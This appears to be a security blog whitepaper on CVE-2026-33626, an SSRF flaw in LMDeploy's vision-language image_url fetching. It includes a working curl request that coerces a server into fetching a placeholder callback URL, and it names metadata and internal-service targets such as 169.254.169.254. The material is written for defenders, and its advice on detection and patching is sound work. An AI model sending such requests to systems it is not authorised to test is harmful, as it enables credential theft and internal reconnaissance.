CVE-2026-33626 and the LMDeploy Vision-Language SSRF Exposure
- ninp0

- 3 days ago
- 5 min read
ABSTRACT
CVE-2026-33626 affects LMDeploy versions before 0.12.3. NVD scores it CVSS 7.5 High, but the real-world impact is amplified by context: a vulnerable vision-language endpoint can be turned into a server-side HTTP client that reaches cloud metadata services, loopback-only databases, internal admin panels, and out-of-band callback infrastructure. Sysdig observed exploitation only 12 hours and 31 minutes after the GitHub advisory page went live.
EXECUTIVE SUMMARY
LMDeploy is an OpenAI-compatible serving stack for large language models and vision-language models. In vulnerable releases, user-controlled image_url values are fetched without sufficient hostname and IP safety checks. A remote attacker can therefore coerce the model server into issuing HTTP requests to attacker-chosen destinations, including link-local, loopback, RFC 1918, or mixed-DNS targets.
NVD describes the flaw as a server-side request forgery in LMDeploy’s vision-language module and lists CVSS 3.1 vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N for a 7.5 High rating. GitHub’s advisory explains the root cause in the load_image() path and includes a proof-of-concept section. Sysdig’s follow-on research shows why defenders should treat this as more than a theoretical SSRF: the first observed attacker session probed AWS IMDS, Redis on 6379, MySQL on 3306, a secondary HTTP admin surface on 8080, and a blind-SSRF callback domain.
AFFECTED CONDITIONS
LMDeploy versions prior to 0.12.3 are affected according to NVD and the GitHub security advisory.
The vulnerable path sits in vision-language request handling, where image_url input can trigger outbound URL fetches on behalf of the server.
The advisory notes that API keys are disabled by default and the server binds to 0.0.0.0 in common deployments, increasing the chance that an exposed instance is reachable from the public internet.
AI-serving environments are especially sensitive because the host often has access to GPU nodes, object storage, internal caches, orchestration APIs, and cloud IAM roles.
ATTACK PATH
The attacker path is straightforward. First, the adversary sends a normal-looking OpenAI-compatible chat request to LMDeploy. Second, they provide an image_url that points at a target the attacker wants the server to fetch. Third, LMDeploy dereferences that URL server-side. If the target is cloud metadata, the server may leak credential material. If the target is a loopback-only service, the attacker gets a yes-or-no signal that the service exists and may retrieve useful protocol banners or error content. If the target is an out-of-band callback domain, the attacker confirms blind SSRF and outbound egress.
Sysdig’s observed attack session adds an important twist: the operator did not stop at metadata probing. They also enumerated /openapi.json and touched LMDeploy’s distributed-serving control plane, including /distserve/p2p_drop_connect, indicating the bug can support follow-on disruption or cluster mapping. In other words, the SSRF can act as both a reconnaissance primitive and a stepping stone to availability impact.
BUSINESS IMPACT
Cloud credential theft: access to AWS, GCP, Azure, ECS, or other metadata endpoints can expose short-lived credentials attached to expensive GPU workloads.
Internal service discovery: loopback or private-network probes can reveal Redis, MySQL, Postgres, Elasticsearch, Docker, or custom admin services that should never be internet reachable.
Inference-stack disruption: attacker awareness of LMDeploy internal control paths increases the risk of denial of service against distributed-serving clusters.
Data exposure: model-serving nodes frequently hold proprietary prompts, customer uploads, model artifacts, and pipeline secrets that are more valuable than the CVSS number alone suggests.
PUBLIC POC AND VALIDATION REFERENCES
Public exploit coverage for this issue is unusual: Sysdig explicitly notes that no standalone public GitHub or exploit-repository PoC was visible when the first attacker hit their honeypot. However, multiple public artifacts now provide concrete proof, reproduction clues, or regression logic defenders can use responsibly:
GitHub Security Advisory GHSA-6w67-hwm5-92mq includes a Proof of Concept section with a callback-server validation flow and a metadata-target example: https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq
Sysdig’s exploitation write-up documents the first observed in-the-wild timeline, exact attacker target patterns, and the OOB callback domain used during probing: https://www.sysdig.com/blog/cve-2026-33626-how-attackers-exploited-lmdeploy-llm-inference-engines-in-12-hours
InternLM pull request #4447 and the associated patch show the remediation logic added for safe URL handling and redirect blocking: https://github.com/InternLM/lmdeploy/pull/4447
The added regression tests in tests/test_lmdeploy/test_vl/test_safe_url.py publicly enumerate blocked cases such as localhost, 169.254.169.254, IPv6 loopback, and mixed-DNS rebinding patterns.
ORIGINAL 0DAY INC LAB-ONLY POC A: CONTROLLED CALLBACK SSRF CHECK
The first 0day Inc PoC is intentionally non-destructive. It uses a lab-controlled callback server and asks a test LMDeploy instance to fetch a benign PNG path from infrastructure you own. If the callback arrives, you have confirmed SSRF behavior without touching cloud metadata or internal production addresses. Use only on systems you own or are explicitly authorized to assess.
# terminal 1: callback listener on a lab-controlled host
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
print(f"[CALLBACK] path={self.path} client={self.client_address} ua={self.headers.get('User-Agent')}")
self.send_response(200)
self.send_header("Content-Type", "image/png")
self.end_headers()
self.wfile.write(b"\x89PNG\r\n\x1a\n")
HTTPServer(("0.0.0.0", 8889), Handler).serve_forever()
PY
# terminal 2: authorized lab request to LMDeploy
curl -s http://LMDEPLOY_HOST:23333/v1/chat/completions \
-H "Content-Type: application/json" \
--data-binary @- <<'JSON'
{
"model": "internlm-xcomposer2",
"messages": [{
"role": "user",
"content": [
{"type": "text", "text": "Describe this image."},
{"type": "image_url", "image_url": {"url": "http://CALLBACK_HOST:8889/lmdeploy-ssrf-canary.png"}}
]
}]
}
JSONInterpretation: a GET request hitting the callback listener from the LMDeploy host confirms that the model server can be coerced into server-side fetches via image_url. That is enough to justify urgent containment because the same primitive can be repurposed against metadata services or internal admin endpoints by a real attacker.
ORIGINAL 0DAY INC LAB-ONLY POC B: PATCH-PRESENCE TRIAGE SCRIPT
The second 0day Inc PoC is a safe offline triage helper for source trees, containers, or mounted package directories. It does not send any network traffic. Instead, it checks whether the LMDeploy codebase contains the core defensive controls introduced by the public remediation effort.
#!/usr/bin/env python3
import pathlib, sys
root = pathlib.Path(sys.argv[1])
target = root / "lmdeploy" / "vl" / "media" / "connection.py"
text = target.read_text() if target.exists() else ""
checks = {
"has_safe_url_guard": "_is_safe_url" in text,
"uses_getaddrinfo": "getaddrinfo" in text,
"blocks_link_local": "169.254" in text or "is_link_local" in text,
"blocks_redirects": "allow_redirects=False" in text.replace(" ", ""),
}
for name, ok in checks.items():
print(f"[{"OK" if ok else "MISS"}] {name}")
if not all(checks.values()):
print("Potentially vulnerable or incompletely patched LMDeploy tree detected.")Interpretation: missing _is_safe_url handling, absent getaddrinfo resolution, missing link-local guards, or lack of redirect suppression should be treated as strong evidence that the runtime is still vulnerable or incompletely patched.
DEFENSIVE IMPLICATIONS
Upgrade immediately to LMDeploy 0.12.3 or later.
Enforce IMDSv2 on AWS-hosted inference nodes so a simple GET-only SSRF cannot harvest credentials from IMDSv1 endpoints.
Restrict outbound egress from AI inference hosts to only the storage, logging, and package sources they truly require.
Alert on outbound access from inference processes to loopback, link-local, and RFC 1918 ranges as well as metadata IPs such as 169.254.169.254 and 169.254.170.2.
Review whether /distserve or other LMDeploy administrative surfaces are internet reachable or unauthenticated in default deployments.
Rotate any cloud credentials, API keys, or service tokens attached to publicly reachable LMDeploy nodes that may have been exposed before patching.
PATCH AND REGRESSION DETAIL
Public patch material is unusually useful here. The lmdeploy pull request and commit history show that remediation added safety checks around URL parsing, DNS resolution, blocked internal address space, and redirect refusal. The associated tests explicitly cover public domains versus loopback, metadata IPs, IPv6 local addresses, and mixed-DNS responses, which is valuable because DNS rebinding is a classic way to bypass naive SSRF allowlists.
That test coverage matters. Many SSRF fixes fail because they validate the original hostname string instead of every resolved address, or because they permit redirects that bounce a safe public URL into a private target. The LMDeploy regression tests added with the patch address both concerns directly.
REFERENCES
RSS source item chosen today: https://thehackernews.com/2026/04/lmdeploy-cve-2026-33626-flaw-exploited.html
NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33626
GitHub Security Advisory GHSA-6w67-hwm5-92mq: https://github.com/InternLM/lmdeploy/security/advisories/GHSA-6w67-hwm5-92mq
InternLM fix commit 71d64a339edb901e9005358e0633fbbab367d626: https://github.com/InternLM/lmdeploy/commit/71d64a339edb901e9005358e0633fbbab367d626
InternLM remediation pull request #4447: https://github.com/InternLM/lmdeploy/pull/4447
InternLM v0.12.3 release: https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3
Sysdig Threat Research Team analysis: https://www.sysdig.com/blog/cve-2026-33626-how-attackers-exploited-lmdeploy-llm-inference-engines-in-12-hours
Bottom line: CVE-2026-33626 is nominally “just” a high-severity SSRF, but in exposed AI-inference deployments it behaves like a fast-moving cloud credential and internal-reconnaissance problem. That makes it a strong whitepaper candidate for 0day Inc even after today’s top-ranked FIRESTARTER story was excluded as a duplicate.





Comments